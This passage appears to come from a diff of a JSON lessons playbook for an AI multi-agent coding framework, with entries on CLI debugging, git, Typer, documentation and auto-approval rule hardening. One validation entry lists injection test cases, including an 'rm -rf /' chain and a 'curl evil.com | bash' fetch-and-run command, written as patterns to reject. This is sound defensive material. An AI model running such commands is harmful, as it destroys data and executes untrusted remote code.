Document search locations in investigation notes for reviewability.", - "code_example": "```bash\n# ✅ COMPREHENSIVE FIRST-ITERATION SEARCH\n# Investigation: Why does 'mapify validate-dependencies --file=X' fail?\n\n# Step 1: Find command definition\ngrep -r \"@app.command('validate-dependencies')\" src/\n# → src/mapify_cli/tools/validate_app.py:15\n\n# Step 2: Check function signature\ngrep -A 10 \"def validate_deps\" src/mapify_cli/tools/validate_app.py\n# → Reveals: file_path: Path = typer.Argument(...)\n# → FINDING: Expects positional Argument, not --file Option!\n\n# Step 3: Find registration in main CLI\ngrep -r \"validate_app\" src/mapify_cli/\n# → src/mapify_cli/main.py: app.add_typer(validate_app.app, name='validate')\n\n# Step 4: Check documentation examples\ngrep -r \"validate-dependencies\" docs/\n# → docs/USAGE.md:45: mapify validate-dependencies --file=path\n# → FINDING: Docs show --file flag (incorrect!)\n\n# Step 5: Check test coverage\ngrep -r \"validate-dependencies\" tests/\n# → tests/test_validate_app.py:23: Uses correct positional syntax\n\n# Step 6: Verify CLI entry point\ngrep \"validate\" pyproject.toml\n# → [project.scripts] mapify = \"mapify_cli.main:app\"\n\n# Result: Complete picture in ONE iteration:\n# - Implementation uses Argument (positional)\n# - Docs incorrectly show Option (--file flag)\n# - Tests use correct syntax\n# - Root cause: documentation drift\n\n# ❌ INCOMPLETE SEARCH (multiple iterations)\n# Iteration 1: Found definition, missed docs\n# Iteration 2: Found docs drift, missed tests\n# Iteration 3: Checked tests...\n# Result: 3 rounds to build complete picture\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T17:45:10.847685Z", - "last_used_at": "2025-10-27T17:45:10.847686Z", - "related_bullets": [ - "test-0025" - ], - "tags": [ - "debugging", - "investigation", - "cli", - "systematic-search", - "checklist" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "test-0001", - 
"content": "Monitor Validation for Security Configs: High-risk configurations (auto-approval rules, permissions, access control) require Monitor agent validation to systematically expose attack vectors. Monitor should check: (1) wildcard scope (does *.ext match unintended files?), (2) binary prefix matches (does cmd* match malicious binaries?), (3) command chaining (does pattern* allow arbitrary suffixes?), (4) argument injection (can user-controlled input bypass intent?). Set high_risk: true for security configs to enforce stricter validation.", - "code_example": "```yaml\n# Monitor validation checklist for security configs\nvalidation_checks:\n wildcard_scope:\n pattern: \"*.json*\"\n test_cases:\n - \"graph.json\" # ✅ Intended match\n - \"graph.json.bak\" # ❌ Unintended match (backup file)\n - \"malicious.json.sh\" # ❌ Unintended match (executable)\n \n binary_prefix:\n pattern: \"jq*\"\n test_cases:\n - \"jq\" # ✅ Intended binary\n - \"jq-exploit\" # ❌ Malicious binary with 'jq' prefix\n - \"jqx\" # ❌ Different tool with 'jq' prefix\n \n command_chaining:\n pattern: \"[ -f file ]*\"\n test_cases:\n - \"[ -f file ]\" # ✅ Intended command\n - \"[ -f file ] && rm -rf /\" # ❌ Chained malicious command\n \n argument_injection:\n pattern: \"git commit -m *\"\n test_cases:\n - \"git commit -m 'fix'\" # ✅ Intended\n - \"git commit -m 'fix' && curl evil.com | bash\" # ❌ Injection\n\n# Mark security-critical configs for strict validation\nconfig_metadata:\n high_risk: true # Triggers additional Monitor checks\n requires_exact_match: true\n allow_wildcards: false\n```", - "tags": [ - "testing", - "security", - "monitor-validation", - "attack-vectors", - "config-validation", - "high-risk" - ], - "helpful_count": 4, - "harmful_count": 0, - "created_at": "2025-10-27T19:38:54.477689+00:00", - "last_used_at": "2025-10-27T19:38:54.477690+00:00", - "related_bullets": [ - "sec-0003", - "sec-0004", - "debug-0001" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - 
}, - "CODE_QUALITY_RULES": { - "description": "Style guides, naming conventions, and maintainability principles", - "bullets": [ - { - "id": "qual-0001", - "content": "Analysis Document Completeness: Every analysis document must answer 4 critical questions: (1) WHAT changed (specific files, functions, lines), (2) WHERE to find it (absolute file paths, not relative), (3) HOW to implement (code examples showing before/after), (4) WHY this approach (rationale, trade-offs). Missing any question creates incomplete handoffs between agents. Use this checklist before finalizing any analysis or findings document in multi-agent workflows.", - "code_example": "```python\n# ✅ COMPLETE Analysis Structure\nanalysis_doc = {\n \"what\": \"Added workflow state persistence to prevent re-execution on restart\",\n \"where\": {\n \"files\": [\"/absolute/path/to/orchestrator.py\", \"/absolute/path/to/state_manager.py\"],\n \"functions\": [\"orchestrator.save_state()\", \"state_manager.load_checkpoint()\"]\n },\n \"how\": {\n \"before\": \"# State lost on restart\\nself.current_subtask = None\",\n \"after\": \"# Persist state\\nself.state_manager.save_checkpoint(self.current_subtask)\\nself.current_subtask = self.state_manager.load_checkpoint() or None\"\n },\n \"why\": \"Prevents wasted computation by resuming from last checkpoint. Trade-off: 50ms overhead per save vs hours of re-execution.\"\n}\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-18T12:26:06.880415Z", - "last_used_at": "2025-10-18T12:26:06.880415Z", - "related_bullets": [], - "tags": [ - "documentation", - "analysis", - "completeness", - "multi-agent", - "code-quality", - "handoff" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "qual-0002", - "content": "Template Purpose Classification: Distinguish template types by purpose when setting optimization targets. 
Teaching templates (e.g., Evaluator with scoring patterns) require concrete code examples and detailed explanations - apply stricter compression ceiling (≤150% over target) to preserve pedagogical value. Validation templates (e.g., Monitor with pass/fail criteria) can use summaries and abbreviated context - permit looser ceiling (≤200% over target) for efficiency. Purpose determines acceptable compression trade-offs: teaching prioritizes completeness (student learning), validation prioritizes speed (binary decisions). Evidence: Monitor template at 135% over target received praise for efficiency, Evaluator template at 238% over target raised concerns about over-compression - different purposes, different quality thresholds.", - "code_example": "```python\n# Template purpose classification system\nclass TemplatePurpose(Enum):\n TEACHING = \"teaching\" # Evaluator, detailed patterns\n VALIDATION = \"validation\" # Monitor, pass/fail checks\n\nclass OptimizationPolicy:\n POLICIES = {\n TemplatePurpose.TEACHING: {\n \"max_ceiling\": 1.5, # 150% over target\n \"preserve\": [\"code_examples\", \"rationale\", \"context\"],\n \"allow_summaries\": False,\n \"priority\": \"pedagogical_completeness\"\n },\n TemplatePurpose.VALIDATION: {\n \"max_ceiling\": 2.0, # 200% over target\n \"preserve\": [\"criteria\", \"thresholds\"],\n \"allow_summaries\": True,\n \"priority\": \"decision_speed\"\n }\n }\n \n @staticmethod\n def get_ceiling(purpose: TemplatePurpose, target_reduction: float):\n policy = OptimizationPolicy.POLICIES[purpose]\n return target_reduction * policy[\"max_ceiling\"]\n\n# Usage:\n# Teaching template (Evaluator)\neval_ceiling = OptimizationPolicy.get_ceiling(TemplatePurpose.TEACHING, 0.5)\n# Result: 0.75 max reduction (50% * 150%)\n\n# Validation template (Monitor) \nmonitor_ceiling = OptimizationPolicy.get_ceiling(TemplatePurpose.VALIDATION, 0.5)\n# Result: 1.0 max reduction (50% * 200%)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": 
"2025-10-18T18:00:00.000000Z", - "last_used_at": "2025-10-18T18:00:00.000000Z", - "related_bullets": [ - "impl-0004", - "qual-0001" - ], - "tags": [ - "template", - "optimization", - "classification", - "purpose", - "teaching", - "validation", - "evaluator", - "monitor", - "map-framework", - "python" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "TOOL_USAGE": { - "description": "Proper usage of libraries, frameworks, APIs, and development tools", - "bullets": [ - { - "id": "tool-0001", - "content": "Proactive Tool Limit Handling for Large Content: Check content size BEFORE choosing Write tool strategy to prevent parameter limit errors. For content >500 lines or >50KB, ALWAYS use temp file + mv approach instead of Write tool directly. Write tool has parameter size limits (~32KB in some environments) causing silent truncation or rejection. Pattern: (1) Write content to /tmp/ via Python/bash heredoc, (2) Verify written content completeness (line count), (3) Move to final destination with mv. This bypasses tool parameter limits by using file I/O directly. 
Threshold proven: 588-line file succeeded with temp approach after Write tool would have hit limits.", - "code_example": "```python\n# ❌ RISKY - Write tool for large content (may hit limits)\ncontent = generate_large_content() # 588 lines, 35KB\nwrite_tool(path='/final/path.txt', content=content)\n# Risk: Tool parameter limit → truncated file or rejection\n\n# ✅ SAFE - temp file + mv for large content\nimport tempfile\nimport subprocess\nimport os\n\ndef write_large_content_safely(content: str, final_path: str):\n \"\"\"Write large content using temp file to bypass tool limits\"\"\"\n \n # Check if content exceeds safe threshold\n line_count = content.count('\\n')\n size_kb = len(content.encode('utf-8')) / 1024\n \n if line_count < 500 and size_kb < 50:\n # Safe to use Write tool directly\n write_tool(path=final_path, content=content)\n return\n \n # Exceeds threshold - use temp file approach\n logger.info(\n f\"Large content detected ({line_count} lines, {size_kb:.1f}KB). \"\n f\"Using temp file approach.\"\n )\n \n # Step 1: Write to temp file\n with tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.txt') as tmp:\n tmp.write(content)\n tmp_path = tmp.name\n \n # Step 2: Verify completeness\n with open(tmp_path) as f:\n written_lines = sum(1 for _ in f)\n \n expected_lines = content.count('\\n') + 1\n if written_lines != expected_lines:\n raise ValueError(\n f\"Content truncation detected: wrote {written_lines} lines, \"\n f\"expected {expected_lines}\"\n )\n \n # Step 3: Move to final destination\n os.makedirs(os.path.dirname(final_path), exist_ok=True)\n subprocess.run(['mv', tmp_path, final_path], check=True)\n \n logger.info(f\"Successfully wrote {line_count} lines to {final_path}\")\n\n# Usage:\ncontent = generate_verified_facts_workflow() # 588 lines\nwrite_large_content_safely(content, 'docs/knowledge_base/verified_facts_workflow.txt')\n```", - "tags": [ - "write-tool", - "file-limits", - "temp-file", - "large-content", - "python", - "bash", - 
"workaround", - "tool-usage", - "map-framework" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T10:08:01.014433Z", - "related_bullets": [ - "impl-0010", - "impl-0005" - ] - }, - { - "id": "tool-0013", - "content": "Bulk Text Replacement: sed vs Edit Tool Trade-offs: For 50+ identical replacements across multiple files, use sed with git verification rather than individual Edit tool calls. Pattern: (1) Run sed with backup: 'sed -i.bak s/old/new/g files', (2) Use git diff for sampling verification, (3) Create descriptive commit with counts. Benefits: 10x faster than Edit calls, atomic operation, easy rollback. Limitations: sed can't handle context-aware changes. Decision criteria: Use sed when replacement is purely textual (command syntax, import paths), use Edit when replacement requires code understanding (refactoring logic, updating arguments). ALWAYS verify with git diff before committing sed changes.", - "tags": [ - "tools", - "automation", - "refactoring" - ], - "helpful_count": 1, - "last_used": "2025-10-24T11:00:00Z" - }, - { - "id": "tool-0014", - "content": "Git History Preservation with 'git mv': When moving or renaming files in Git, ALWAYS use 'git mv' instead of manual mv + git add/rm. Git mv explicitly preserves file history, making git log --follow and git blame work correctly across renames. Manual move breaks history tracking - Git treats it as delete + create, losing authorship and change history. This is critical for code archaeology (understanding why code exists), security audits (tracking vulnerability introductions), and compliance (proving authorship). Use 'git mv' for ALL file relocations, even within same directory (renaming). 
Verify history preservation after move with 'git log --follow '.", - "code_example": "```bash\n# ❌ WRONG - Manual move breaks Git history\nmv src/old_name.py src/new_name.py\ngit add src/new_name.py\ngit rm src/old_name.py\ngit commit -m \"Rename file\"\n# Result: git log src/new_name.py shows only commit after move\n# History from old_name.py is lost unless using --follow flag\n\n# ✅ CORRECT - git mv preserves history explicitly\ngit mv src/old_name.py src/new_name.py\ngit commit -m \"Rename old_name.py to new_name.py\"\n# Result: git log --follow src/new_name.py shows complete history\n\n# Verification:\ngit log --follow --oneline src/new_name.py\n# Should show commits from before rename\n\ngit blame src/new_name.py\n# Should show original authors, not just person who moved file\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:32:16.485303Z", - "last_used_at": "2025-10-25T13:32:16.485304Z", - "related_bullets": [ - "tool-0013" - ], - "tags": [ - "git", - "version-control", - "history-preservation", - "refactoring", - "file-movement", - "bash", - "git-mv" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "tool-0078", - "content": "Self-Documenting Workflow Configuration: Embed third-party service setup instructions (OIDC trusted publishing, webhooks, API keys) directly in workflow/script header comments with EXACT project-specific values. Include service URL, required fields (repository owner, workflow name, environment), and step-by-step setup process. This eliminates wiki hunting and prevents configuration drift when onboarding new maintainers. 
Pattern particularly valuable for one-time setups that are infrequently modified.", - "code_example": "```yaml\n# ❌ POOR - external documentation link (breaks when wiki moves)\n# Setup: See https://wiki.example.com/oidc-setup\nname: Publish to TestPyPI\njobs:\n publish:\n runs-on: ubuntu-latest\n\n# ✅ GOOD - embedded setup instructions with project values\n# TestPyPI Trusted Publishing Setup (One-time configuration):\n# 1. Navigate to https://test.pypi.org/manage/account/publishing/\n# 2. Click \"Add a new pending publisher\"\n# 3. Fill in these EXACT values:\n# - PyPI Project Name: mapify-cli\n# - Owner: azalio\n# - Repository name: map-framework\n# - Workflow name: test-pypi.yml\n# - Environment name: (leave empty)\n# 4. Save configuration\n# 5. First workflow run will establish trust, subsequent runs auto-authenticate\n\nname: Publish to TestPyPI\non:\n workflow_dispatch:\njobs:\n publish:\n runs-on: ubuntu-latest\n permissions:\n id-token: write # OIDC authentication\n contents: read\n```", - "tags": [ - "github-actions", - "oidc", - "documentation", - "self-documenting", - "onboarding" - ], - "related_bullets": [ - "tool-0001", - "doc-0008" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T21:42:37.952230+00:00", - "last_used_at": "2025-10-25T21:42:37.952230+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "tool-0079", - "content": "Native Parser for Configuration Extraction: When CI workflows need values from configuration files (pyproject.toml, package.json, Cargo.toml), use language-native parsers instead of grep/sed/awk. Regex-based extraction breaks on edge cases (multiline strings, escaped quotes, comments, nested structures). Python tomllib (stdlib since 3.11) for TOML, jq for JSON, yq for YAML. Parse once, extract multiple fields. 
Pattern prevents fragile pipelines that break on legitimate config changes.", - "code_example": "```yaml\n# ❌ FRAGILE - regex extraction breaks on edge cases\n- name: Extract package metadata\n run: |\n PKG_NAME=$(grep '^name = ' pyproject.toml | cut -d'\"' -f2)\n # Breaks if: name = \"pkg-name\" # comment\n # Breaks if: name = \"pkg\\\"name\" # escaped quote\n # Breaks if: multiline value\n\n# ✅ ROBUST - native TOML parser\n- name: Extract package metadata\n run: |\n python3 << 'EOF'\n import tomllib\n import sys\n\n with open('pyproject.toml', 'rb') as f:\n cfg = tomllib.load(f)\n\n # Extract multiple fields in one parse\n print(f\"PKG_NAME={cfg['project']['name']}\")\n print(f\"PKG_VERSION={cfg['project']['version']}\")\n print(f\"PYTHON_REQUIRES={cfg['project']['requires-python']}\")\n EOF\n # Handles all edge cases: escapes, multiline, comments, nested dicts\n\n# Alternative for JSON (package.json)\n- name: Extract from package.json\n run: |\n PKG_NAME=$(jq -r '.name' package.json)\n PKG_VERSION=$(jq -r '.version' package.json)\n\n# Alternative for YAML (using yq)\n- name: Extract from config.yml\n run: |\n APP_NAME=$(yq '.app.name' config.yml)\n```", - "tags": [ - "ci-cd", - "parsing", - "toml", - "python", - "configuration", - "robustness" - ], - "related_bullets": [], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T21:42:37.952230+00:00", - "last_used_at": "2025-10-25T21:42:37.952230+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "tool-0080", - "content": "Edit Tool Read-First Workflow: ALWAYS Read file before using Edit tool to capture exact substrings, avoiding 'old_string not found' errors in structured documents (markdown with headings, code blocks). Mental approximation of file content leads to failed edits. Workflow: (1) Read file with offset/limit if long, (2) Copy exact old_string from Read output including whitespace/newlines, (3) Edit with sufficient surrounding context for uniqueness. 
Use line numbers from Read output (format: 'spaces + line number + tab + content') to locate insertion points.", - "code_example": "```python\n# ❌ INCORRECT - Edit without reading (mental approximation)\nEdit(file, old_string=\"## Section\\n\", new_string=\"## New Section\\n\")\n# Result: 'old_string not found' error\n\n# ✅ CORRECT - Read first workflow\nRead(file, offset=733, limit=6) # Get exact content at line 736\n# Output: '735\\t\\n736\\t\\n737\\t'\n\nEdit(file, \n old_string=\"\\n\\n\", # Exact from Read output (after tab)\n new_string=\"\\n\\n### New Field\\n[Documentation]\\n\\n\"\n)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T16:17:18.196096Z", - "last_used_at": null, - "related_to": [], - "tags": [ - "edit-tool", - "file-operations", - "workflow-pattern", - "error-prevention", - "read-tool" - ] - }, - { - "id": "tool-0007", - "content": "Typer CLI Parameter Type Enforcement: Typer enforces parameter types at CLI level - when function signature declares file_path: Path = typer.Argument(...), Typer treats it as POSITIONAL argument (no flag), but file_path: Path = typer.Option(...) treats it as NAMED option (requires --file-path flag). Mismatches between documentation examples and parameter declarations cause 'no such option' errors. Critical distinction: typer.Argument() creates positional params (usage: command value), typer.Option() creates flag-based params (usage: command --flag=value). Always verify Typer parameter decorator matches intended CLI usage pattern. 
Check function signature in implementation (not just docs) when debugging CLI errors - docs may drift from code.", - "code_example": "```python\nimport typer\nfrom pathlib import Path\n\napp = typer.Typer()\n\n# ❌ MISMATCH - docs say --file but implementation expects positional\n@app.command('validate-deps')\ndef validate_deps_wrong(\n file_path: Path = typer.Argument(..., help=\"Python file to validate\")\n):\n \"\"\"Docs incorrectly show: mapify validate-deps --file=src/main.py\"\"\"\n pass\n# Result: Users run --file flag → \"Error: No such option: --file\"\n# Root cause: Argument() means positional, not flag-based\n\n# ✅ CORRECT - Argument for positional parameters\n@app.command('validate-deps')\ndef validate_deps_positional(\n file_path: Path = typer.Argument(..., help=\"Python file to validate\")\n):\n \"\"\"Usage: mapify validate-deps src/main.py (no flag)\"\"\"\n validator = DependencyValidator()\n return validator.validate(file_path)\n\n# ✅ CORRECT - Option for flag-based parameters\n@app.command('validate-deps')\ndef validate_deps_option(\n file_path: Path = typer.Option(..., \"--file\", help=\"Python file to validate\")\n):\n \"\"\"Usage: mapify validate-deps --file=src/main.py (with flag)\"\"\"\n validator = DependencyValidator()\n return validator.validate(file_path)\n\n# Decision criteria:\n# - Use Argument() for required positional inputs (file paths, IDs)\n# - Use Option() for optional flags or when explicit naming aids clarity\n# - Match documentation examples to implementation parameter type\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T17:45:10.847688Z", - "last_used_at": "2025-10-27T17:45:10.847689Z", - "related_bullets": [ - "arch-0014", - "impl-0046" - ], - "tags": [ - "typer", - "cli", - "python", - "parameter-validation", - "type-enforcement" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "tool-bidirectional-sync", - "content": "Bidirectional Template Synchronization for CLI Tools: 
When developing CLI tools that distribute templates via package managers (pip install, npm install), maintain bidirectional sync between development templates (.claude/) and distribution templates (src/templates/). Pattern: dedicated verification subtask + check script (./scripts/check-template-sync.sh using diff -q) + git pre-commit hook. Critical because users get templates via 'mapify init' from packaged src/templates/, NOT from .claude/ dev directory. Evidence: Zero drift issues across 8 agent templates + 6 command templates after Sequential Thinking Integration.", - "code_example": "```bash\n#!/bin/bash\n# scripts/check-template-sync.sh\nfor agent in task-decomposer actor monitor predictor evaluator; do\n source=\".claude/agents/${agent}.md\"\n target=\"src/templates/agents/${agent}.md\"\n if ! diff -q \"$source\" \"$target\" > /dev/null; then\n echo \"❌ OUT OF SYNC: ${agent}.md\"\n exit 1\n fi\ndone\necho \"✅ All templates in sync\"\n```", - "related_to": [ - "impl-0005" - ], - "tags": [ - "cli-tools", - "template-management", - "package-distribution", - "synchronization", - "bash" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143918" - } - ] - }, - "DEBUGGING_TECHNIQUES": { - "description": "Troubleshooting workflows, diagnostic approaches, and debugging tools", - "bullets": [ - { - "id": "debug-0009", - "content": "Debugging UV tool installation failures: (1) 'uv tool list', (2) 'uv tool dir', (3) check PATH, (4) 'which command', (5) 'uv tool install --force', (6) verify pyproject.toml entry points.", - "code_example": "", - "helpful_count": 9, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892099Z", - "last_used_at": "2025-10-24T13:29:43.892100Z", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "debug-0001", - "content": "Progressive Security Hardening Cycle for Auto-Approval Rules: Security-critical configurations require 3+ iterations 
of hardening: (1) Initial broad patterns for functionality, (2) Monitor validation exposes overly permissive rules, (3) Narrow to specific paths/commands, (4) Monitor exposes wildcard edge cases, (5) Exact-match anchoring. Each iteration addresses a distinct vulnerability class. Typical progression: broad wildcards → scoped wildcards → space-delimited tokens → exact strings.", - "code_example": "```yaml\n# Iteration 1: Initial broad patterns (functionality focus)\nauto_approve:\n - \"cat *.json*\" # ❌ Monitor catches: matches .json.bak\n - \"| jq*\" # ❌ Monitor catches: binary prefix attack\n\n# Iteration 2: Narrow to specific paths (after Monitor feedback)\nauto_approve:\n - \"cat graph.json\" # ✅ Scoped to exact file\n - \"| jq*\" # ❌ Monitor catches: still allows jq-exploit\n\n# Iteration 3: Space-delimited tokens (after 2nd Monitor feedback)\nauto_approve:\n - \"cat graph.json\"\n - \"| jq *\" # ✅ Space prevents binary prefix\n # ❌ Monitor catches: trailing wildcard allows arbitrary args\n\n# Iteration 4: Exact-match anchoring (final hardening)\nauto_approve:\n - \"cat graph.json\"\n - \"| jq '.tasks'\" # ✅ Exact binary + exact arguments\n - \"git status\" # ✅ No wildcards anywhere\n\n# Result: 3 iterations to reach security-hardened config\n```", - "tags": [ - "debugging", - "security", - "progressive-hardening", - "monitor-validation", - "iterative-refinement", - "auto-approval" - ], - "helpful_count": 4, - "harmful_count": 0, - "created_at": "2025-10-27T19:38:54.477687+00:00", - "last_used_at": "2025-10-27T19:38:54.477688+00:00", - "related_bullets": [ - "sec-0003", - "sec-0004" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "DOCUMENTATION_PATTERNS": { - "description": "Best practices for maintaining clear, accurate, and maintainable documentation", - "bullets": [ - { - "id": "doc-0001", - "content": "Documentation Structure Preservation During Updates: When removing sections from markdown documentation, always verify and preserve 
sequential numbering of remaining sections. Use markdown's implicit numbering (all items as '1.') rather than explicit numbers ('1.', '2.', '3.') to make numbering self-correcting. After removal, validate that navigation links, cross-references, and table of contents reflect the new structure. This prevents broken documentation flow and reader confusion.", - "code_example": "```markdown\n\n1. Introduction\n2. Setup (REMOVED)\n3. Usage ← Now shows as 3 but should be 2\n4. API Reference ← Now shows as 4 but should be 3\n\n\n1. Introduction\n1. Usage ← Markdown auto-numbers as 2\n1. API Reference ← Markdown auto-numbers as 3\n\n\n1. Introduction\n2. Usage ← Manually renumbered\n3. API Reference ← Manually renumbered\n\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-23T12:06:20.145336Z", - "last_used_at": "2025-10-23T12:06:20.145337Z", - "related_bullets": [], - "tags": [ - "markdown", - "documentation", - "numbering", - "structure", - "maintenance" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0002", - "content": "Confidence Labeling in Technical Documentation: Explicitly mark verification level of technical claims using standardized labels: VERIFIED (empirically tested with bash/tools on available platform), RESEARCHED (found in authoritative documentation but not tested locally), EXPECTED (logically inferred from architecture/patterns but not directly confirmed), UNKNOWN (no evidence found). Confidence labels prevent readers from treating all claims equally - they signal which claims are definitive vs provisional. Particularly critical for cross-platform claims (feature may be VERIFIED on darwin, EXPECTED on linux), library version dependencies (VERIFIED for v2.1, EXPECTED for v2.0), and time-sensitive information (VERIFIED as of 2025-10-23). 
Pattern proven: documentation without confidence labels caused users to treat inferred behavior as verified fact, leading to incorrect assumptions.", - "code_example": "```markdown\n## Confidence Labeling Examples\n\n### Example 1: Platform-Specific Claim\n**Claim**: MAP framework CLI supports colored output\n**Evidence**: Tested with `map-cli --help` on macOS Terminal\n**Label**: ✅ VERIFIED (darwin/macOS Terminal, 2025-10-23)\n**Label**: ⚠️ EXPECTED (linux, not tested)\n\n### Example 2: Version-Dependent Claim\n**Claim**: context7 MCP tool requires library ID format '/org/project'\n**Evidence**: context7 documentation v1.2, not tested empirically\n**Label**: 📚 RESEARCHED (per docs v1.2, not verified in practice)\n\n### Example 3: Inferred Claim\n**Claim**: Curator agent syncs bullets with helpful_count >= 5 to cipher\n**Evidence**: Template instructions mention threshold, no cipher sync observed yet\n**Label**: 🔮 EXPECTED (per template spec, not empirically confirmed)\n\n### Example 4: Unknown\n**Claim**: Does Reflector agent support batch processing of multiple subtasks?\n**Evidence**: No documentation found, no code inspection performed\n**Label**: ❓ UNKNOWN (requires investigation)\n\n### Markdown Format Template\n```markdown\n**Feature**: [Feature name]\n**Status**: ✅ VERIFIED | 📚 RESEARCHED | 🔮 EXPECTED | ❓ UNKNOWN\n**Platform**: darwin/linux/windows (if platform-specific)\n**Version**: [library version] (if version-specific)\n**Date**: 2025-10-23 (if time-sensitive)\n**Evidence**: [verification command or documentation reference]\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-23T13:33:55.447326Z", - "last_used_at": "2025-10-27T13:12:08.809242Z", - "related_bullets": [ - "res-0001", - "doc-0001" - ], - "tags": [ - "confidence-labeling", - "documentation", - "verification-status", - "evidence", - "technical-writing", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0003", - "content": 
"Multi-Tier Prioritization for Large-Scale Documentation Refactoring: When updating 80+ references across 12+ files after API/CLI changes, use 4-tier priority strategy: Tier 1 (Critical) - user-facing help text and primary docs that users encounter first; Tier 2 (High) - internal technical documentation used by developers; Tier 3 (Medium) - knowledge base and presentations; Tier 4 (Low) - historical documents (add deprecation notes only, preserve original syntax). Update tiers sequentially with verification between tiers. This prevents inconsistent user experience while preserving historical context. Commit message should include tier breakdown with reference counts for traceability (e.g., 'Tier 1: 30 refs, Tier 2: 40 refs').", - "tags": [ - "documentation", - "refactoring", - "prioritization" - ], - "helpful_count": 1, - "last_used": "2025-10-24T11:00:00Z" - }, - { - "id": "doc-0004", - "content": "Historical Documentation Preservation During API Migration: When updating CLI commands or API syntax across documentation, preserve historical examples in specific contexts: (1) .reviews/ directories - leave unchanged as historical records of past code review discussions, (2) Playbook pattern examples - keep old syntax to show command evolution over time, (3) CHANGELOG.md - never update (historical document by definition), (4) Archived/deprecated docs - add deprecation notice at top pointing to current docs instead of bulk updating. This prevents confusion about 'what was the command syntax when this was written' during debugging or archaeology. 
Use --exclude-dir flags in sed/grep to automatically skip these directories.", - "tags": [ - "documentation", - "migration", - "preservation" - ], - "helpful_count": 1, - "last_used": "2025-10-24T11:00:00Z" - }, - { - "id": "doc-0005", - "content": "Executable Documentation with Binary Verification: For multi-stage workflows (releases, deployments, migrations), structure documentation as executable runbooks with copy-pasteable command sequences and binary success criteria. Each section must have: (1) Exact commands (no placeholders, use example values), (2) Expected Results checkboxes with measurable criteria (100% test pass, no errors, specific file exists), (3) Time-aware verification for async operations (sleep commands before checking distributed state like PyPI indexing). Structure enables both learning (detailed explanations) and execution (appendix runbook with consolidated commands). Pattern proven: 350-line RELEASING.md with 18 checkboxes across 5 sections achieved 9.1/10 quality score. Users can execute workflow mechanically by following checkboxes without interpretation.", - "code_example": "```markdown\n## Pre-Release Checklist\n\n### 1. Code Quality Checks\n\n```bash\n# Run full CI/CD test suite locally\npytest tests/ --cov=src/mapify_cli --cov-report=term-missing\n\n# Run linters\nblack src/ tests/ --check\nruff check src/ tests/\n```\n\n**Expected Results**:\n- ✅ All tests pass (100% success rate)\n- ✅ No linting errors\n- ✅ Type checking passes\n\n### 2. 
Time-Aware Verification (Async Systems)\n\n```bash\n# Wait for PyPI to process upload (2-5 min indexing delay)\nsleep 120\n\n# Verify package indexed\ncurl -f https://pypi.org/project/mapify-cli/1.0.1/ || echo \"❌ Not indexed yet\"\npip index versions mapify-cli | grep 1.0.1\n```\n\n## Appendix: Release Workflow Reference\n\n```bash\n# Complete command sequence (copy-paste execution mode)\ngit checkout main && git pull origin main\npytest tests/ --cov\n./scripts/bump-version.sh patch\ngit push origin main && git push origin v1.0.1\ngh release create v1.0.1 --title \"v1.0.1\" --notes \"$(sed -n '/## \\\\[1.0.1\\\\]/,/## \\\\[/p' CHANGELOG.md | head -n -1)\"\ngh run watch\nsleep 120 && pip index versions mapify-cli | grep 1.0.1\n```\n```", - "tags": [ - "documentation", - "runbooks", - "workflows", - "executable", - "verification", - "binary-criteria", - "releases", - "bash", - "markdown" - ], - "related_bullets": [ - "arch-0004", - "impl-0010", - "doc-0002" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T19:32:35.864754+00:00", - "last_used_at": "2025-10-25T19:32:35.864754+00:00", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0006", - "content": "Single Source of Truth with Explicit Derivation: In documentation with multiple artifact types (CHANGELOG, git tags, release notes), declare ONE canonical source and document explicit commands for deriving all other artifacts. This prevents content drift where artifacts diverge over time. Pattern: CHANGELOG.md as single source of truth → git tag annotation extracted via sed, GitHub release notes extracted via sed, version strings extracted via grep. Derivation commands must be copy-pasteable and deterministic (no manual text editing). Monitor caught drift where command extracted from wrong source - explicit derivation commands make errors detectable. 
